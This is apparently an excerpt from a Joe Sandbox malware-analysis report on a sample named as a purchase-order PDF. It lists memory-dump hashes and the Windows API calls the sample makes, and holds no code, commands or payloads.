                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ca5b57caec423602bad9c6dd526bd0c7c55cd735e7aafe8cfe319f36df7c38a5
                                                                                                                                    • Instruction ID: 06e7bc4888d24dc8705f17eccb7129b00728b8d0f8e220614c625a1788d5b882
                                                                                                                                    • Opcode Fuzzy Hash: ca5b57caec423602bad9c6dd526bd0c7c55cd735e7aafe8cfe319f36df7c38a5
                                                                                                                                    • Instruction Fuzzy Hash: F5C1AD74E01218CFDB54DFA5C994B9DBBB2FF89300F2081A9D809AB365DB359A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: de396b412a76025e1426032bfd5e4fba55bbc8c4d2331e1e2042575fa4260215
                                                                                                                                    • Instruction ID: 5b0c3eaf7efcfe12a890eab1c8657d33ea6babc9cb864eacec2b76688d8d7ec9
                                                                                                                                    • Opcode Fuzzy Hash: de396b412a76025e1426032bfd5e4fba55bbc8c4d2331e1e2042575fa4260215
                                                                                                                                    • Instruction Fuzzy Hash: CBC1BF74E01218CFDB54DFA5C994B9DBBB2FF89300F6081A9D809AB365DB349A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 884c893169a1bbcee843f727757b74d3e375b0f0589708913403d5f51245dbe5
                                                                                                                                    • Instruction ID: 635bf2e456b2f3ca32b2509dfbd21565cc26d33bada7f1323466a432088a48d2
                                                                                                                                    • Opcode Fuzzy Hash: 884c893169a1bbcee843f727757b74d3e375b0f0589708913403d5f51245dbe5
                                                                                                                                    • Instruction Fuzzy Hash: E4C1BC74E01218CFDB54DFA5C994B9DBBB2FF89300F6081A9D809AB365DB349A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b82484f3301e338667218c5a2cb30b8fda862dc11b1be2bd33ebc5cff4b74eda
                                                                                                                                    • Instruction ID: 9b21f7111d4b3fe5922dd096e7445026430d202f1db5a557fcc0cd842de8c9d4
                                                                                                                                    • Opcode Fuzzy Hash: b82484f3301e338667218c5a2cb30b8fda862dc11b1be2bd33ebc5cff4b74eda
                                                                                                                                    • Instruction Fuzzy Hash: 09C1AD74E01218CFDB15DFA5C994B9DBBB2FF89300F6081A9D809AB365DB349A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: caaca739fa2432f5e33266e6a463d14fbaeffc1df6ff663bb333f2a9304c5bcb
                                                                                                                                    • Instruction ID: 53d62828945acb9cd52ff82a8b34301c099aba55275a4e72643c6cb92fb210f9
                                                                                                                                    • Opcode Fuzzy Hash: caaca739fa2432f5e33266e6a463d14fbaeffc1df6ff663bb333f2a9304c5bcb
                                                                                                                                    • Instruction Fuzzy Hash: B5C1BD74E01218CFDB15DFA5C994B9DBBB2FF89300F2081A9D809AB365DB349A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 54b22b00b9c0eae362f41315bcbd7a78772d9c8eac6c073ac1f7b6fe6cc330b0
                                                                                                                                    • Instruction ID: 265aecfe4787ae7b632f1e166aec1557c1787c938c63ec2ba754102325811cff
                                                                                                                                    • Opcode Fuzzy Hash: 54b22b00b9c0eae362f41315bcbd7a78772d9c8eac6c073ac1f7b6fe6cc330b0
                                                                                                                                    • Instruction Fuzzy Hash: 56C1BE74E01218CFDB15DFA5C994B9DBBB2FF89300F2081A9D809AB365DB349A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3312198563.0000000032B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 32B30000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_32b30000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7c03374e083695d0b55871d0fecfd35a4004305b339695ecc2487bbabd442baf
                                                                                                                                    • Instruction ID: 3ce8e6bd3e1dea61f17cc298131c61603f97f8f9ff16e6b49ab8c058cdf3175d
                                                                                                                                    • Opcode Fuzzy Hash: 7c03374e083695d0b55871d0fecfd35a4004305b339695ecc2487bbabd442baf
                                                                                                                                    • Instruction Fuzzy Hash: 88C1B074E01218CFDB55DFA5C994B9DBBB2FF89300F2080A9D908AB365DB349A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3312198563.0000000032B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 32B30000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_32b30000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 55e8b05040d744f39d3865e8e46acc10e7c8f6a12a46085cf35947a8c6fe89cf
                                                                                                                                    • Instruction ID: 5922d6594ec7dd9267568efb626ae282671a2b5015ea93a7b834cbfd017e10b5
                                                                                                                                    • Opcode Fuzzy Hash: 55e8b05040d744f39d3865e8e46acc10e7c8f6a12a46085cf35947a8c6fe89cf
                                                                                                                                    • Instruction Fuzzy Hash: 3DC1B074E01218CFDB55DFA5C994B9DBBB2FF88300F2081A9D909AB365DB349A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3312198563.0000000032B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 32B30000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_32b30000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 027fbd92a632d5f9d211dd6013902035c54099d6e3fc393f65b2bc1d88eb1b88
                                                                                                                                    • Instruction ID: 1a57fba378b5d1aab0aa9327f5a9e839b3af1ca27dbab33a29848c7e538c0549
                                                                                                                                    • Opcode Fuzzy Hash: 027fbd92a632d5f9d211dd6013902035c54099d6e3fc393f65b2bc1d88eb1b88
                                                                                                                                    • Instruction Fuzzy Hash: B2C1AE74E01218CFDB55DFA5C994B9DBBB2FF89300F2081A9D809AB365DB359A85CF10
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3312198563.0000000032B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 32B30000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_32b30000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 53acd313fb0c29989a4473d54c5e9857eaafc157090b55d437237be239dcdd14
                                                                                                                                    • Instruction ID: ca1e24c6096b440f91a73313c35423c423dc67224a9b628d80ccb54db8ae1549
                                                                                                                                    • Opcode Fuzzy Hash: 53acd313fb0c29989a4473d54c5e9857eaafc157090b55d437237be239dcdd14
                                                                                                                                    • Instruction Fuzzy Hash: 14C1AF74E01218CFDB55DFA5C994B9DBBB2FF89300F2081A9D809AB365DB349A85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: fa7db21a0a353bc7ab0c0b403f51567c374f7ada7e1dd8b12ee45131c21d4099
                                                                                                                                    • Instruction ID: b37722ca49914f4f01e720a7599bab755d3d7b075d8f6fbad5bf4bb20a3e2d15
                                                                                                                                    • Opcode Fuzzy Hash: fa7db21a0a353bc7ab0c0b403f51567c374f7ada7e1dd8b12ee45131c21d4099
                                                                                                                                    • Instruction Fuzzy Hash: E1A18C74A02228CFDB64DF64C994B9ABBB2BF4A301F1085EAD44DA7350DB359E81CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d25e4ed944411e556d7a99a1f724f0245693492f99707c905d9885227e955199
                                                                                                                                    • Instruction ID: 569f17fac4f5e791ec351c988965b161b0148ce393c68ed6aeb0758da38f7612
                                                                                                                                    • Opcode Fuzzy Hash: d25e4ed944411e556d7a99a1f724f0245693492f99707c905d9885227e955199
                                                                                                                                    • Instruction Fuzzy Hash: B8517E74A01228CFCB65DF24C994B9AB7B2FF4A305F5089E9D44AA7350CB359E81CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314608165.0000000035E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E60000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35e60000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5bc0b721f1f280f8e1a7538006a6f05055ab3bf20fd684fee1cabf8a953aef5f
                                                                                                                                    • Instruction ID: 505879582f5e9df1b80762727f0c291b858c28f26d9cf47883a56f74193538f3
                                                                                                                                    • Opcode Fuzzy Hash: 5bc0b721f1f280f8e1a7538006a6f05055ab3bf20fd684fee1cabf8a953aef5f
                                                                                                                                    • Instruction Fuzzy Hash: 09D01735D512188ACB11DFA898406ECB774EB99310F0120A28248A3110D7B04A90CE41
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 530a414393c317c01efedf94df19ab9b76cae2dbf87835c5450bc9def9cdabf4
                                                                                                                                    • Instruction ID: 6f57e6aee11de3a3247b10465c33b3456d7c52c05e62d8056692fa098d005bc8
                                                                                                                                    • Opcode Fuzzy Hash: 530a414393c317c01efedf94df19ab9b76cae2dbf87835c5450bc9def9cdabf4
                                                                                                                                    • Instruction Fuzzy Hash: 9CD09E75D5522CDACB21DF64D8506ECB774FF99300F0125A5814CB7110D7B09E94DA55
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 00405351
                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00405360
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040539D
                                                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 004053A4
                                                                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
                                                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
                                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
                                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
                                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405440
                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405461
                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
                                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
                                                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 0040536F
                                                                                                                                      • Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,?,00403F7A), ref: 0040415C
                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004054B3
                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004054C8
                                                                                                                                    • ShowWindow.USER32(00000000), ref: 004054EC
                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 004054F1
                                                                                                                                    • ShowWindow.USER32(00000008), ref: 0040553B
                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
                                                                                                                                    • CreatePopupMenu.USER32 ref: 00405580
                                                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004055B4
                                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405615
                                                                                                                                    • EmptyClipboard.USER32 ref: 0040561B
                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405631
                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405665
                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405670
                                                                                                                                    • CloseClipboard.USER32 ref: 00405676
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                    • String ID: {
                                                                                                                                    • API String ID: 590372296-366298937
                                                                                                                                    • Opcode ID: c03f886d1af96994fdbb0a23cef68d0ed2242977acd76286432e3196303c0609
                                                                                                                                    • Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
                                                                                                                                    • Opcode Fuzzy Hash: c03f886d1af96994fdbb0a23cef68d0ed2242977acd76286432e3196303c0609
                                                                                                                                    • Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58
                                                                                                                                    APIs
                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
                                                                                                                                    • ShowWindow.USER32(?), ref: 00403C9A
                                                                                                                                    • DestroyWindow.USER32 ref: 00403CAE
                                                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00403CEB
                                                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403D06
                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00403DB4
                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00403DBE
                                                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
                                                                                                                                    • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403E29
                                                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00403ECF
                                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00403EF0
                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00403F02
                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00403F1D
                                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403F33
                                                                                                                                    • EnableMenuItem.USER32(00000000), ref: 00403F3A
                                                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00403F52
                                                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
                                                                                                                                    • lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
                                                                                                                                    • SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 004040D6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 184305955-0
                                                                                                                                    • Opcode ID: 1f500e8277606cc2b60b0699cfffcfb82421e5b85fdc00a0e0ef9cc185334c76
                                                                                                                                    • Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
                                                                                                                                    • Opcode Fuzzy Hash: 1f500e8277606cc2b60b0699cfffcfb82421e5b85fdc00a0e0ef9cc185334c76
                                                                                                                                    • Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D
                                                                                                                                    APIs
                                                                                                                                    • CheckDlgButton.USER32(?,-0000040A,?), ref: 00404354
                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404368
                                                                                                                                    • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404385
                                                                                                                                    • GetSysColor.USER32(?), ref: 00404396
                                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
                                                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 004043B7
                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
                                                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
                                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 00404432
                                                                                                                                    • SendMessageW.USER32(00000000), ref: 00404439
                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404464
                                                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
                                                                                                                                    • SetCursor.USER32(00000000), ref: 004044B8
                                                                                                                                    • ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,?), ref: 004044CD
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
                                                                                                                                    • SetCursor.USER32(00000000), ref: 004044DC
                                                                                                                                    • SendMessageW.USER32(00000111,?,00000000), ref: 0040450B
                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                    • String ID: -B@$N$open
                                                                                                                                    • API String ID: 3615053054-1057335957
                                                                                                                                    • Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                                    • Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
                                                                                                                                    • Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                                    • Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                                      • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                                    • lstrcatW.KERNEL32(00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75923420,00441800,00000000,0043F000), ref: 0040391F
                                                                                                                                    • lstrlenW.KERNEL32(00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75923420), ref: 0040399F
                                                                                                                                    • lstrcmpiW.KERNEL32(00432E98,.exe,00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
                                                                                                                                    • GetFileAttributesW.KERNEL32(00432EA0), ref: 004039BD
                                                                                                                                    • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,0043F800), ref: 00403A06
                                                                                                                                      • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                                                    • RegisterClassW.USER32(00433EA0), ref: 00403A43
                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
                                                                                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403AC6
                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
                                                                                                                                    • RegisterClassW.USER32(00433EA0), ref: 00403B08
                                                                                                                                    • DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                    • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                    • API String ID: 1975747703-1115850852
                                                                                                                                    • Opcode ID: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
                                                                                                                                    • Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
                                                                                                                                    • Opcode Fuzzy Hash: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
                                                                                                                                    • Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D
                                                                                                                                    APIs
                                                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                    • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                    • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
